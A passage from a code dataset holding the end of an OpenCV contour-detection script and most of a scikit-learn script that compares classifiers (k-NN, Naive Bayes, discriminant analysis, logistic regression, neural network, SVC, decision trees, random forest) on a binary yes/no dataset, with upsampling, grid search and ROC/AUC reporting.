cv2.CHAIN_APPROX_NONE)\n # for each contour, we are going to find the area fest\n for cnt in contours:\n area = cv2.contourArea(cnt)\n print(area)\n # draw the contour to 'imgContour' if area is greater than 500px\n # .drawContours() : image, contours, contourIndex, color, thickness\n if area > 500:\n cv2.drawContours(imgResult, cnt, -1, (255, 0, 0), 3)\n # length of each contour arc by arc\n peri = cv2.arcLength(cnt, True)\n # get the point of corner point\n approx = cv2.approxPolyDP(cnt, 0.02*peri, True)\n # create object corner / bounding boxes\n x, y, w, h = cv2.boundingRect(approx)\n\n\nwhile True:\n success, img = cap.read()\n imgResult = img.copy()\n findColor(img, myColors)\n cv2.imshow(\"result\", img)\n if cv2.waitKey(1) & 0xFF ==ord('q'):\n break","sub_path":"jajal/opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"61630172","text":"import os\nimport numpy as np\nimport pandas as pd\nimport sklearn as sk\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import classification_report\n\n# import warnings filter\nfrom warnings import simplefilter\n\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\n\n\n#################################\n# load data and preprocess it #\n#################################\n\n# use \"data_final\"\nsource = \"data_final\"\n# if ensemble is not used, upsample_input = 3 should be set for non-tree models -> higher model performance\nupsample_input = 3\n#upsample_input = 1\ndata = pd.read_csv(source+'.csv')\n\n\nprint('This Script is from', source)\nprint('it is upsampled times:', upsample_input)\n\n\ndata_numerical = pd.get_dummies(data, drop_first=True)\ndata_numerical = data_numerical.drop('y_yes', axis=1)\n\n# creating X and Y categories\nX_ori = data_numerical\nY = data['y']\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\nfrom sklearn.model_selection import train_test_split, cross_val_score\n\n# raised to train_size of 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n# upsampling not used in the current approach\n# (implement for non-ensemble approach with 3 differently transformed datasets for non-trees, trees and LightGBM\n# UPSAMPLING:\nfrom sklearn.utils import resample\ntrain_data = X_train.copy()\ntrain_data[\"y\"] = Y_train\ntrain_data_minority = train_data.loc[train_data[\"y\"] == \"yes\"]\ntrain_data_majority = train_data.loc[train_data[\"y\"] == \"no\"]\n# for checking class sizes:\nprint(\"majority: {}, minority: {}\".format(len(train_data_majority), len(train_data_minority)))\n# change parameter 'n_samples' to change upsampled data set size\ntrain_data_minority_upsampled = resample(train_data_minority,\n replace=True,\n n_samples=len(train_data_minority)*upsample_input,\n random_state=0)\ntrain_data_upsampled = pd.concat([train_data_minority_upsampled, train_data_majority])\nX_train = train_data_upsampled.copy().iloc[:, :-1]\nY_train = train_data_upsampled[\"y\"]\nprint(\"upsampled data set class counts: \", Y_train.value_counts())\n\n# add the specific hyper-parameters, that lead to the highest result, to the report df\nreport = pd.DataFrame(columns=['Model', \"Best Params\", 'Acc. Train', 'Acc. Test', 'F1-Score Test', 'AUC', 'precision', 'recall'])\n\n\n# ------------------------------------ #\n# used for custom ensemble, DEPRECATED #\n# ------------------------------------ #\n# y_test_global = Y_test\n# y_train_global = Y_train\n# ensemble_y_train_list = []\n# ensemble_y_pred_list = []\n#\n# X_train_index = X_train.index\n# Y_train_index = Y_train.index\n# X_test_index = X_test.index\n# Y_test_index = Y_test.index\n#\n# print(X_train)\n# print(Y_train)\n# print(X_test)\n# print(Y_test)\n\n#################\n# Functions #\n#################\n\n\n# function for creating a plot\ndef create_gridsearch_plot(model_gs, param, param_label, title):\n fig, ax1 = plt.subplots()\n color = 'tab:blue'\n ax1.set_xlabel(param_label)\n ax1.set_ylabel('Mean Accuracy', color=color)\n ax1.plot(model_gs.param_grid[param], model_gs.cv_results_[\"mean_test_score\"], color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n\n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n color = 'tab:red'\n ax2.set_ylabel('Standard Deviation', color=color) # we already handled the x-label with ax1\n ax2.plot(model_gs.param_grid[param], model_gs.cv_results_[\"std_test_score\"], color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n fig.tight_layout() # otherwise the right y-label is slightly clipped\n plt.title('Comparison of Accuracies and Standard Deviation ({})'.format(title))\n plt.xticks(model_gs.param_grid[param])\n plt.show()\n\n\n# function to calculate cmtr, acctr, cmte, accte\ndef calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred):\n cmtr = confusion_matrix(Y_train, Y_train_pred)\n acctr = accuracy_score(Y_train, Y_train_pred)\n cmte = confusion_matrix(Y_test, Y_test_pred)\n accte = accuracy_score(Y_test, Y_test_pred)\n return {\"cmtr\": cmtr, \"acctr\": acctr, \"cmte\": cmte, \"accte\": accte}\n\n\n# Visualize Confusion Matrix\nfrom sklearn.metrics import confusion_matrix, plot_confusion_matrix\ndef confusion_matrix_plotter(model, X_test, Y_test):\n plot_confusion_matrix(model, X_test, Y_test, labels=['no', 'yes'],\n cmap=plt.cm.Blues, values_format='d')\n plt.show()\n\n\n# function to caluclate precision metric\ndef calculate_precision_recall(Y_test, Y_test_pred):\n Y_test_numb = pd.get_dummies(Y_test, drop_first=True)\n Y_test_pred_numb = pd.get_dummies(Y_test_pred, drop_first=True)\n precision = round(metrics.precision_score(Y_test_numb, Y_test_pred_numb), 4)\n recall = round(metrics.recall_score(Y_test_numb, Y_test_pred_numb), 4)\n return {\"precision\": precision, \"recall\": recall}\n\n\n# calculate f1 score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import f1_score\n\n# function to caluclate f1 score\ndef calculate_f1_score(Y_test, Y_test_pred):\n lb_churn = LabelEncoder()\n Y_test_code = lb_churn.fit_transform(Y_test)\n Y_test_pred_code = lb_churn.fit_transform(Y_test_pred)\n f1te = f1_score(Y_test_code, Y_test_pred_code)\n print(f1te)\n return f1te\n\n\n# calculate ROC and AUC and plot the curve\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\n# function to calculate ROC and AUC and plot the curve\ndef calculate_roc_auc(model, X_test, Y_test):\n Y_probs = model.predict_proba(X_test)\n #print(Y_probs[0:6, :]) # testing\n Y_test_probs = np.array(np.where(Y_test == 'yes', 1, 0))\n #print(Y_test_probs[0:6]) # testing\n fpr, tpr, threshold = roc_curve(Y_test_probs, Y_probs[:, 1])\n #print(fpr, tpr, threshold) # testing\n roc_auc = auc(fpr, tpr)\n #print(roc_auc) # testing\n # Precision-recall-curve\n Y_test_probs = np.array(np.where(Y_test == 'yes', 1, 0))\n Y_test_pred_probs = np.array(np.where(Y_test_pred == 'yes', 1, 0))\n average_precision = average_precision_score(Y_test_probs, Y_test_pred_probs)\n disp = plot_precision_recall_curve(model, X_test, Y_test)\n disp.ax_.set_title('2-class Precision-Recall curve: '\n 'AP={0:0.2f}'.format(average_precision))\n plt.show()\n return {\"roc_auc\": roc_auc, \"fpr\": fpr, \"tpr\": tpr}\n\n\n# plot model metrics fpr, tpr, roc_auc\nimport matplotlib.pyplot as plt\n\n# function to plot model metrics fpr, tpr, roc_auc\ndef plot_model_metrics(metrics_dict, title):\n plt.plot(metrics_dict[\"fpr\"], metrics_dict[\"tpr\"], 'b', label='AUC = %0.2f' % metrics_dict[\"roc_auc\"])\n plt.legend(loc='lower right')\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.title(title)\n plt.show()\n\n\n# FOR TREES only\n# show feature importance\ndef plot_feature_importance(model, title):\n list(zip(X, model.feature_importances_))\n index = np.arange(len(model.feature_importances_))\n bar_width = 1.0\n plt.bar(index, model.feature_importances_, bar_width)\n plt.xticks(index, list(X), rotation=90) # labels get centered\n plt.title(title)\n plt.show()\n\n\n\nfrom tabulate import tabulate\n# formerly using tabulate for plotting, not implemented at the moment\n# function to return information about the two param variations and their outcomes\ndef create_tabulate_plot(model_gs, param_1, param_2, param_label_1, param_label_2, title):\n print(pd.DataFrame({param_1: model_gs.cv_results_[\"param_{}\".format(param_1)], param_2: model_gs.cv_results_[\"param_{}\".format(param_2)], \"mean_test_score\": model_gs.cv_results_[\"mean_test_score\"], \"std_test_score\": model_gs.cv_results_[\"std_test_score\"]}))\n # not yet working, refactoring needed:\n print(\"Best accuracy is: \".format(np.max(model_gs.cv_results_[\"mean_test_score\"])))\n maxi = model_gs.best_params_\n print(\"Best params are: {}\".format(maxi))\n\n\n\n#####################\n# START OF MODELS #\n#####################\n\n\n################\n# KNN #\n################\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# new GridSearchCV implementation\n# attention: the parameter 'n_jobs=-1' means all CPU cores will be used. This may result in an overflow of the RAM\nmodel_gs_param_grid = {\"n_neighbors\": [4]}\n#model_gs_param_grid = {\"n_neighbors\": [6]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=KNeighborsClassifier(), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\n\n\n# plot gridsearch\ncreate_gridsearch_plot(model_gs, \"n_neighbors\", \"Number of Neighbors\", \"k-NN\")\n\n\n# implement best model:\nknnmodel = model_gs.best_estimator_\nknnmodel.fit(X_train, Y_train)\nY_train_pred = knnmodel.predict(X_train)\nY_test_pred = knnmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# plot confusion matrix\nconfusion_matrix_plotter(knnmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate metrics roc_auc, fpr, tpr\nroc_auc_results = calculate_roc_auc(knnmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n\n\n# plot model metrics\nplot_model_metrics(metrics_dict, 'ROC Curve of k-NN')\n\n\n# add metrics to the report:\nreport.loc[len(report)] = ['k-NN', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# testing:\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_KNN_report.csv', index = False)\n\n\n\n\n###############\n# Naive Bayes #\n###############\n\nfrom sklearn.naive_bayes import GaussianNB\n\n\n# no grid search applied\nnbmodel = GaussianNB()\nnbmodel.fit(X_train, Y_train)\nY_train_pred = nbmodel.predict(X_train)\nY_test_pred = nbmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# plot confusion matrix\nconfusion_matrix_plotter(nbmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(nbmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n\n\n# plot the metrics\nplot_model_metrics(metrics_dict, 'ROC Curve of GaussianNB')\n\n\n# add metrics to the report:\nreport.loc[len(report)] = ['Naive Bayes', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n#########################\n# Discriminant Analysis #\n#########################\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n# no grid search applied\ndismodel = LinearDiscriminantAnalysis()\ndismodel.fit(X_train, Y_train)\nY_train_pred = dismodel.predict(X_train)\nY_test_pred = dismodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(dismodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(dismodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Linear Discriminate Analysis')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Linear Discriminant Analysis', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n\n#####################################\n# Quadratic Disciminant Analysis #\n#####################################\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\n\n# no grid search applied\nqdismodel = QuadraticDiscriminantAnalysis()\nqdismodel.fit(X_train, Y_train)\nY_train_pred = qdismodel.predict(X_train)\nY_test_pred = qdismodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(qdismodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(qdismodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Quadratic Discriminate Analysis')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Quadratic Discriminant Analysis', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n#######################\n# Logistic Regression #\n#######################\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# no grid search applied\nlrmodel = LogisticRegression(class_weight=\"balance\", random_state=0)\nlrmodel.fit(X_train, Y_train)\nY_train_pred = lrmodel.predict(X_train)\nY_test_pred = lrmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(lrmodel, X_test, Y_test)\n\n\n# print classification report:\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(lrmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Logistic Regression')\n\n\nreport.loc[len(report)] = ['Logistic Regression', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# testing\nprint(report)\n\n\n\n\n##################\n# Neural Network #\n##################\n\nfrom sklearn.neural_network import MLPClassifier\n\n\nmodel_gs_param_grid = {\"hidden_layer_sizes\": [(10,10)], 'max_iter': [500]}\n#model_gs_param_grid = {\"hidden_layer_sizes\": [(10,10)], 'max_iter': [500]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=MLPClassifier(random_state=0, activation='relu'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n# creating a Plot\ncreate_tabulate_plot(model_gs, \"hidden_layer_sizes\", \"max_iter\", \"hidden layer size of the NN\", \"maximum Iterations\", \"Neural Network\")\n\n\n# create model using the optimal parameters\nnnetmodel = model_gs.best_estimator_\nnnetmodel.fit(X_train, Y_train)\nY_train_pred = nnetmodel.predict(X_train)\nY_test_pred = nnetmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n# plot confusion matrix\nconfusion_matrix_plotter(nnetmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(nnetmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Neural Network')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Neural Network', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_NN_report.csv', index = False)\n\n\n#############\n# SVC #\n#############\n\nfrom sklearn.svm import LinearSVC\n\nmodel_gs_param_grid = {\"C\": [13]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=LinearSVC(random_state=0, max_iter= 3000, class_weight=\"balanced\"), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\n\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n\n# creating a Plot\ncreate_gridsearch_plot(model_gs, \"C\", \"C of SVC\", \"Linear SVC\")\n\n\n# create model using the optimal parameters\nsvcmodel = model_gs.best_estimator_\nsvcmodel.fit(X_train, Y_train)\nY_train_pred = svcmodel.predict(X_train)\nY_test_pred = svcmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(svcmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report SVC: \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\nmetrics_dict[\"roc_auc\"] = \"Not available\"\n\n# # calculate ROC and AUC and plot the curve -> not available with LinearSVC\n# # we could use SVC(probability=True), but this is significantly slower and the results are not good enough to use in\n# # our final ensemble. So we will not plot roc_auc\n# roc_auc_results = calculate_roc_auc(svcmodel, X_test, Y_test)\n# metrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\n# metrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\n# metrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n# plot_model_metrics(metrics_dict, 'ROC Curve of SVC')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['SVC', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_SVC_report.csv', index = False)\n\n\n\n#########################################################\n# Tree classifiers #\n#-> preprocess data differently (no upsampling) #\n#--> currently not in use due to ensembling approach #\n#########################################################\n\n\n# use \"data_final\"\nsource = \"data_final\"\nupsample_input = 1\ndata = pd.read_csv(source+'.csv')\n\n\nprint('This Script is from', source)\nprint('it is upsampeld times:', upsample_input)\n\n\ndata_numerical = pd.get_dummies(data, drop_first=True)\ndata_numerical = data_numerical.drop('y_yes', axis=1)\n\n# creating X and Y categories\nX_ori = data_numerical\nY = data['y']\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\n\n# approach for custom upsampling - DEPRECATED due to new approach: select data_final without upsampling for all models\n# different approach due to ensembling with different datasets: select rows by indices of first train_test_split\n\nfrom sklearn.model_selection import train_test_split\n\n# raised to train size of 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n#print(\"Y_test is equals to Y_test_global: \", Y_test.equals(y_test_global))\n\n\n# select same rows as in initial train_test_split\n# X_train = X_ori[X_ori.index.isin(X_train_index)]\n# Y_train = Y[Y.index.isin(Y_train_index)]\n# X_test = X_ori[X_ori.index.isin(X_test_index)]\n# Y_test = Y[Y.index.isin(Y_test_index)]\n\n\n######################\n# Decision Trees #\n######################\n\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nmodel_gs_param_grid = {'max_depth': [5]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=DecisionTreeClassifier(criterion='entropy', random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\n\n# creating a Plot\ncreate_gridsearch_plot(model_gs, \"max_depth\", \"max depth of the tree\", \"Decision Tree\")\n\n\n# create model with optimal parameters\netmodel = model_gs.best_estimator_\netmodel.fit(X_train, Y_train)\nY_train_pred = etmodel.predict(X_train)\nY_test_pred = etmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(etmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(etmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Decision Tree')\n\n\n# plot feature importance\nplot_feature_importance(etmodel, 'Decision Tree - Feature Importance')\n\n# add metrics to the report\nreport.loc[len(report)] = ['Decision Tree', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_decision_tree_report.csv', index = False)\n\n\n# # if wanted: display the tree as an image using graphviz\n# #=============================================================================\n# #show tree using graphviz\n# import graphviz\n# dot_data = sk.tree.export_graphviz(etmodel, out_file=None,\n# feature_names=list(X),\n# filled=True, rounded=True,\n# special_characters=True)\n# graph = graphviz.Source(dot_data)\n# graph.format = 'png'\n# graph.render(\"Churn_entropy\")\n# #=============================================================================\n\n#################\n# Gini #\n#################\n\n\nmodel_gs_param_grid = {\"max_depth\": [4]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=DecisionTreeClassifier(random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint(model_gs.cv_results_)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_gini_report.csv', index = False)\n\n# creating a Plot\ncreate_gridsearch_plot(model_gs, \"max_depth\", \"max depth of the tree\", \"Gini Decision Tree\")\n\n\n# create model using the optimal parameters\ngtmodel = model_gs.best_estimator_\ngtmodel.fit(X_train, Y_train)\nY_train_pred = gtmodel.predict(X_train)\nY_test_pred = gtmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(gtmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(gtmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Gini Decision Tree')\n\n\n# plot feature importance\nplot_feature_importance(gtmodel, 'Gini Decision Tree - Feature Importance')\n\n# add metrics to the report\nreport.loc[len(report)] = ['Gini', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_gini_report.csv', index = False)\n\n# # part of custom ensemble, DEPRECATED\n# ensemble_y_train_list.append(Y_train_pred)\n# ensemble_y_pred_list.append(Y_test_pred)\n\n\n# # if wanted: display the tree as an image using graphviz\n# #=============================================================================\n# #show tree using graphviz\n# import graphviz\n# dot_data = sk.tree.export_graphviz(gtmodel, out_file=None,\n# feature_names=list(X),\n# filled=True, rounded=True,\n# special_characters=True)\n# graph = graphviz.Source(dot_data)\n# graph.format = 'png'\n# graph.render(\"Gini_Tree_Image\")\n# #=============================================================================\n\n\n#################\n# Random Forest #\n#################\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n\n# Build RandomForest model where the max_depth and the n_estimators is tested\n# new GridSearchCV implementation\n# attention: the parameter 'n_jobs=-1' means all CPU cores will be used. This may result in an overflow of the RAM\n# do not forget to change parameter 'cv'\nmodel_gs_param_grid = {'max_depth': [12], 'n_estimators': [400]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=RandomForestClassifier(random_state=0, class_weight='balanced'), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\nprint('Random-Forest-Results-Training: /n:', model_gs.cv_results_)\n\n\n# print GridSearchCV results\ncreate_tabulate_plot(model_gs, \"max_depth\", \"n_estimators\", \"max depth\", \"number of trees\", \"Random Forest\")\n\n# plot gridsearch\n#create_gridsearch_plot(model_gs, \"max_depth\", \"Maximum depth of the tree\", \"Random Forest\")\n\n\n# create model using the optimal parameters\nrfmodel = model_gs.best_estimator_\nrfmodel.fit(X_train, Y_train)\nY_train_pred = 